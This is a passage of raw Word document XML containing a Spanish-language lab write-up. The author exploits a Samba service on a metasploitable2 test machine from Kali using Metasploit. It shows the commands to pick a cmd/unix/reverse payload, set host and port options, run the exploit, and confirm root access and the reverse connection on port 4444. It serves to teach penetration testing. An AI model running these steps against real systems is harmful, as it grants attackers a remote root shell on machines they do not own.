      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="00AC7BED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 xml:space="preserve">Una vez seleccionado el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, el siguiente paso fue selecciona</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">r el código malicioso o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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>que se ejecutará en la máquina que será comprometida. Para ver todo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s los disponible</w:t>
      </w:r>
      <w:r w:rsidR="00AC7BED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, se ejecutó el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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171575" cy="257175"/>
                <wp:effectExtent l="0" t="0" r="28575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672BF">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                              </w:rPr>
                              <w:t>show</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00667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payloads</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w:rsidR="006672BF" w:rsidRDefault="00667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0;width:92.25pt;height:20.2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">
                <v:textbox>
                  <w:txbxContent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6672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>show</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="006672B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payloads</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7BED" w:rsidRPr="006672BF" w:rsidRDefault="00AC7BED" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="00AC7BED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 xml:space="preserve">Como resultado, se obtiene una lista con una serie de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">n información referente a ellos </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">como su nombre, una breve descripción y un ranking. De todos los </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>pay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> disponibles, seleccionamos </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>en la máquina “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRP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04800"/>
                <wp:effectExtent l="0" t="0" r="1143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BF" w:rsidRDefault="006672BF">
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="006672BF">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                              </w:rPr>
                              <w:t>set</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00667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payload</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00667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cmd</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="006672BF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unix</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="006672BF">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                              </w:rPr>
                              <w:t>/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0;width:186.95pt;height:24pt;z-index:25166950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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF">
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>set</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="006672B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payload</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="006672B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cmd</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="006672BF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unix</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>/reverse</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF" w:rsidP="00AC7BED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 xml:space="preserve">Ya se han seleccionado, tanto el módulo para transportar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>payloa</w:t>
      </w:r>
      <w:r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 xml:space="preserve">, como dicho código malicioso, </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>así que ya sólo queda fijar los parámetros del puerto y direccion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>es de la máquina a comprometer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="00AC7BED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 xml:space="preserve">Así pues, se fijan los parámetros con los siguientes comandos y finalmente, se ejecuta el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="003059EE" w:rsidP="003059EE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003059EE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00575" cy="8572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EE" w:rsidRPr="00F51125" w:rsidRDefault="003059EE" w:rsidP="003059E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</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd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HOST 192.168.10.11</w:t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(máquina destino)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003059EE" w:rsidRPr="00F51125" w:rsidRDefault="003059EE" w:rsidP="003059E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</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd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PORT 445</w:t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uerto)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003059EE" w:rsidRPr="00F51125" w:rsidRDefault="003059EE" w:rsidP="003059E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</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd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HOST 192.168.10.10 </w:t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(máquina origen)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003059EE" w:rsidRPr="00F51125" w:rsidRDefault="003059EE" w:rsidP="003059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loit</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd"/>
                          </w:p>
                          <w:p w:rsidR="003059EE" w:rsidRDefault="00305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0;width:362.25pt;height:67.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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="003059EE" w:rsidRPr="00F51125" w:rsidRDefault="003059EE" w:rsidP="003059E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>set</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd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HOST 192</w:t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>.168.10.11</w:t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(máquina destino)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003059EE" w:rsidRPr="00F51125" w:rsidRDefault="003059EE" w:rsidP="003059E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>set</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd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PORT 445</w:t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>(puerto)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003059EE" w:rsidRPr="00F51125" w:rsidRDefault="003059EE" w:rsidP="003059E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>set</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd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HOST 192.168.10.10 </w:t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(máquina origen)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003059EE" w:rsidRPr="00F51125" w:rsidRDefault="003059EE" w:rsidP="003059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>exploit</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd"/>
                    </w:p>
                    <w:p w:rsidR="003059EE" w:rsidRDefault="003059EE"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006672BF" w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRDefault="006672BF" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003059EE" w:rsidRDefault="003059EE" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003059EE" w:rsidRPr="006672BF" w:rsidRDefault="003059EE" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="0092277A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Al ejecutar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, en un principio, y si todo ha ido bien, s</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">e debería haber establecido una </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>conexión telnet con la máquina "metasploitable2". Para comprobar</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>lo</w:t>
      </w:r>
      <w:r w:rsidR="000D4269">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, se ejecutaro</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">n los siguientes </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">comandos (terminal </w:t>
      </w:r>
      <w:r w:rsidR="005767B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005767B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la que se ha accedido a </w:t>
      </w:r>
      <w:r w:rsidR="005767B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>metasploitable2</w:t>
      </w:r>
      <w:r w:rsidR="005767B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> y en otra distinta):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005767B8" w:rsidRPr="005767B8" w:rsidRDefault="005767B8" w:rsidP="005767B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767B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>En una consola normal de “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005767B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005767B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005767B8" w:rsidRDefault="005767B8" w:rsidP="0092277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668655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10 19.25.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B8" w:rsidRPr="005767B8" w:rsidRDefault="005767B8" w:rsidP="005767B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767B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>En la consola de “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005767B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005767B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005767B8" w:rsidRDefault="005767B8" w:rsidP="0092277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776605"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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10 19.24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BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="0092277A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A continuación, se comprobó con el comando "id" que usuario éra</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">mos en la máquina comprometida, </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>viendo que teníamos el "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>" y "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>gid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">" 0, que corresponde al usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="0092277A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Posteriormente, se utilizó el comando "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>", pasándole su salida</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> al comando "grep" para filtrar </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>todas aquellas conexiones de red que utilizan el puerto 4</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">444, y se guardó en el fichero </w:t>
      </w:r>
      <w:r w:rsidR="00AC7BED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>samba.tx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC7BED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> la información completa de los procesos que llevan la conexión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1" w:rsidP="00315FF1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95825" cy="2714625"/>
                <wp:effectExtent l="0" t="0" r="28575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stat</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gram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op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grep 4444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n: muestra la dirección numérica de la máquina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a: muestra los sockets en escucha y los que no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o: incluye la información de los </w:t>
                            </w:r>
                            <w:proofErr w:type="spell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ers</w:t>
                            </w:r>
                            <w:proofErr w:type="spell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p: muestra el </w:t>
                            </w:r>
                            <w:proofErr w:type="spell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d</w:t>
                            </w:r>
                            <w:proofErr w:type="spell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programa al que pertenece el socket.</w:t>
                            </w:r>
                          </w:p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proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gram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f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grep 4444 &gt;&gt; /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ba.tx</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/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e: selecciona todos los procesos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a: selecciona todos los procesos menos los ligados a una terminal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f: muestra el listado completo.</w:t>
                            </w:r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0;width:369.75pt;height:213.7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">
                <v:textbox>
                  <w:txbxContent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netstat</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gram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naop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grep 4444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-n: muestra la dirección numérica de la máquina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-a: muestra los sockets en escucha y los que no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o: incluye la información de los </w:t>
                      </w:r>
                      <w:proofErr w:type="spell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timers</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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p: muestra el </w:t>
                      </w:r>
                      <w:proofErr w:type="spell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pid</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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programa al que pertenece el socket.</w:t>
                      </w:r>
                    </w:p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ps</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gram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eaf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grep 4444 &gt;&gt; /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samba.tx</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/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-e: selecciona todos los procesos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-a: selecciona todos los procesos menos los ligados a una terminal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-f: muestra el listado completo.</w:t>
                      </w:r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  <w:r w:rsidR="006672BF" w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF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AC7BED" w:rsidRDefault="00AC7BED" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005767B8" w:rsidRDefault="005767B8" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005767B8" w:rsidRDefault="005767B8" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005767B8" w:rsidRDefault="005767B8" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="000D4269" w:rsidP="00922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idamente</w:t>
      </w:r>
      <w:r w:rsidR="006672BF" w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, se comprobó en una sesión normal en la máquina "</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
